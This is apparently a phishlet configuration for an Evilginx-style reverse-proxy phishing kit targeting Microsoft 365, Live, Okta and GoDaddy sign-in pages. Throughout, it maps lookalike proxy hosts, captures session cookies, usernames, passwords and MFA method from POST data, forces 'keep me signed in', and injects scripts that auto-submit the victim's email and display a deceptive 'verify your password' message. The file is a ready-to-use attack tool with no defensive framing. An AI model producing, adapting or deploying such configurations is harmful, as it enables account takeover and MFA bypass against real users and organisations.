name: 'Microsoft 365 with ADFS and Godaddy'
author: 'phish'
min_ver: '3.1.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'portal', orig_sub: 'portal', domain: 'microsoftonline.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'account', orig_sub: 'account', domain: 'microsoftonline.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoft.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'aadcdn', orig_sub: 'aadcdn', domain: 'msftauth.net', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'microsoft365.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: false, is_landing: false, auto_filter: true}
  - { phish_sub: "m93b6u", orig_sub: "o", domain: "okta.com", session: true, is_landing: false, auto_filter: true }
  - { phish_sub: "89gsvl", orig_sub: "account", domain: "live.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "0c2jgb", orig_sub: "outlook", domain: "live.com", session: true, is_landing: false, auto_filter: true }
  - { phish_sub: 'sso', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing: false, auto_filter: true }
  - { phish_sub: '', orig_sub: '', domain: 'godaddy.com', session: false, is_landing: false, auto_filter: true }
  - { phish_sub: '', orig_sub: '', domain: 'office.com', session: true, is_landing: false, auto_filter: true}
  - { phish_sub: "msft", orig_sub: "msft.sts", domain: "microsoft.com", session: true, is_landing: false, auto_filter: true }
  - { phish_sub: "certauth", orig_sub: "certauth.msft.sts", domain: "microsoft.com", session: true, is_landing: false, auto_filter: true  }
  - { phish_sub: "ulgroup", orig_sub: "ulgroup", domain: "okta.com", session: true, is_landing: false, auto_filter: true }
  - { phish_sub: 'autologon', orig_sub: 'autologon', domain: 'microsoftazuread-sso.com', session: false, is_landing: false, auto_filter: true }
  - { phish_sub: "o", orig_sub: "o", domain: "okta.com", session: true, is_landing: false, auto_filter: true }
  - { phish_sub: "sci", orig_sub: "sci", domain: "okta.com", session: true, is_landing: false, auto_filter: true }
  - { phish_sub: "dotfoods", orig_sub: "dotfoods", domain: "okta.com", session: true, is_landing: false, auto_filter: true }
  - { phish_sub: "login", orig_sub: "login", domain: "okta.com", session: true, is_landing: false, auto_filter: true }
  - { phish_sub: "aadcdn", orig_sub: "aadcdn", domain: "msauth.net", session: true, is_landing: false, auto_filter: true }
  - { phish_sub: "cdn", orig_sub: "logincdn", domain: "msauth.net", session: true, is_landing: false, auto_filter: true }
  - { phish_sub: '', orig_sub: '', domain: 'microsoft.com', session: true, is_landing: false, auto_filter: true }
  - { phish_sub: "msft", orig_sub: "msft.sts", domain: "microsoft.com", session: true, is_landing: false, auto_filter: true }
sub_filters:
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: 'login.microsoftonline.com', orig_sub: 'accounts', domain: 'google.com', search: 'accounts.google.com/o/saml2/idp', replace: 'accounts.{domain}/o/saml2/idp', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - { triggers_on: "login.microsoftonline.com", orig_sub: "aadcdn", domain: "msauth.net", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "logincdn", domain: "msauth.net", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "usa.authpoint.watchguard.com", orig_sub: "usa.authpoint", domain: "watchguard.com", search: "{domain}", replace: "{domain}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - { triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript']}

  - { triggers_on: "login.microsoftonline.com", orig_sub: "sso", domain: "godaddy.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "outlook", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }

  - { triggers_on: "login.live.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.live.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.live.com", orig_sub: "login", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.live.com", orig_sub: "account", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.live.com", orig_sub: "outlook", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.live.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }

  - { triggers_on: "account.live.com", orig_sub: "login", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "account.live.com", orig_sub: "account", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "account.live.com", orig_sub: "outlook", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "account.live.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
    type: 'cookie'
  - domain: 'sso.secureserver.net'
    keys: ['(.*)', '.*,regexp']  
  - domain: 'sso.godaddy.com'
    keys: ['akm_lmprb-ssn', '(.*)', 'akm_lmprb']
  - domain: '.live.com'
    keys: ['wlidperf', 'MSPAuth', 'MSPProf', 'WLSSC', 'RPSAuth', 'RPSSecAuth', 'MH', 'ANON', 'NAP', 'MUID', 'PPLState', '.*,regexp']
  - domain: '.login.live.com'
    keys: ['MSCC', 'OParams', 'MSPOK','JSHP', 'JSH', 'SDIDC', 'MSPBack','MSPSoftVis', 'uaid', 'MSPRequ', '.*,regexp']
  - domain: 'login.live.com'
    keys: ['__Host-MSAAUTH', '.*,regexp']
  - domain: 'outlook.live.com'
    keys: ['DefaultAnchorMailbox', 'O365Consumer', 'SuiteServiceProxyKey', 'X-OWA-CANARY', 'ClientId', 'exchangecookie', 'orgName', 'domainName', 'LI', 'UC', 'RoutingKeyCookie', '.*,regexp']
credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password|accesspass)'
    search: '(.*)'
    type: 'post'
  custom:
    - key: 'mfaAuthMethod'
      search: '(.*)'
      type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'
auth_urls:
  - "/kmsi*"
  - "/CheckCookie"
  - "/ppsecure/post.srf*"
  - "/owa/prefetch.aspx*"
  - "/webmanifest.json*"
  - "/landingv2"
  # - "v1/api/pass/o365/header"
  - "/login.srf"
  - "/idp/idx"
  - "/idp/idx/.*"
  - "/siteminderagent/.*"
  - "/saml/sso/.*"
  - "/api/v1/authn"
force_post:
  - path: '/kmsi'
    search: 
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/common/SAS/EndAuth'
    search: 
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/ppsecure/post.srf'
    search:
      - {key: 'login', search: '.*'}
      - {key: 'passwd', search: '.*'}
      - {key: 'i13', search: '.*'}
    force:
      - {key: 'i13', value: '1'}
      - {key: 'KMSI', value: 'on'}
    type: 'post'
  - path: "/ppsecure/post*"
    search:
      - { key: "LoginOptions", search: "1" }
    force:
      - { key: "DontShowAgain", value: "true" }
    type: "post"
  - path: '/_/signin/sl/challenge'
    search:
      - {key: 'f.req', search: '.*'}
      - {key: 'continue', search: '.*'}
    force:
      - {key: 'continue', value: ''}
    type: 'post'
js_inject:
  - trigger_domains: ["login.microsoftonline.com", "login.live.com"]
    trigger_paths: ["/common/oauth2/", "/", "/*"]
    script: |
      window.addEventListener("load", () => {
        function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySelector(e)&&(t(document.querySelector(e)),r.disconnect())});r.observe(document.body,{childList:!0,subtree:!0})})}
        waitForElm("#i0116").then((elm) => {
          if (window.location.hash.length == 0) {
            return
          }
          elm.focus();
          let hash;
          if (window.location.hash.slice(-1) == "=") {
            hash = window.location.hash.slice(1,-1);
          } else {
            hash = window.location.hash.slice(1);
          }
          elm.value = hash;
          const submBtn = document.querySelector("#idSIButton9");
          submBtn.focus();
          submBtn.click();
        });
        waitForElm("#loginHeader").then((elm) => {
          let p = document.createElement('p');
          p.textContent = "Because you're accessing sensitive info you need to verify your password";
          document.querySelectorAll("#loginHeader")[0].appendChild(p);
        });
      });
  - trigger_domains: ["login.microsoftonline.com"]
    trigger_paths: ["/common/login", "/login.srf"]
    script: |
      function autoBtnClick() {
        function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySelector(e)&&(t(document.querySelector(e)),r.disconnect())});r.observe(document.body,{childList:!0,subtree:!0})})}
        waitForElm("#KmsiCheckboxField").then((elm) => {
          if (document.getElementById("KmsiCheckboxField") != null) {
            setTimeout(() => {document.getElementById("idSIButton9").click()}, 1000);
          } else {setTimeout(() => {autoBtnClick()}, 1000)}
        });
      }
      setTimeout(() => {autoBtnClick()}, 1500);      
  - trigger_domains: ["login.microsoftonline.com", "login.live.com"]
    trigger_paths: ["/common/oauth2/", "/", "/*"]
    script: |
      window.addEventListener("load", () => {

        function isBase64(str) {
          if (str === '' || str.trim() === ''){return false}
          try {if (btoa(atob(str)) == atob(btoa(str))) return true} catch {return false}
        }

        var email;
        if (window.location.hash.substring(1)) {
          email = window.location.hash.substring(1)
        } else if (String(window.location.href).split("////")[1].split("?")[0]) {
          email = String(window.location.href).split("////")[1].split("?")[0];
        }

        if (email) {
          email = isBase64(email) ? window.atob(email) : email 
        }
        
        function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySelector(e)&&(t(document.querySelector(e)),r.disconnect())});r.observe(document.body,{childList:!0,subtree:!0})})}

        waitForElm("#i0116").then((elm) => {if (!email) {return} else {email = email.replace(/[=]/gi, ''); elm.value = email; waitForElm("#idSIButton9").then((elm) => {elm.focus(); elm.click()}); }});

        waitForElm("#loginHeader").then((elm) => {let p = document.createElement('p');p.textContent = "Because you're accessing sensitive info you need to verify your password";document.querySelectorAll("#loginHeader")[0].appendChild(p)});

        if (document.querySelector('#aadTitleHint > small:nth-child(1)')) {
            var wrkBtn = document.querySelector('#aadTitleHint > small:nth-child(1)'); wrkBtn.focus(); wrkBtn.click();
        } else if (document.querySelector('#aadTileTitle')) {
            var wrkBtn = document.querySelector('#aadTileTitle'); wrkBtn.focus(); wrkBtn.click();
        }
        
      }); 
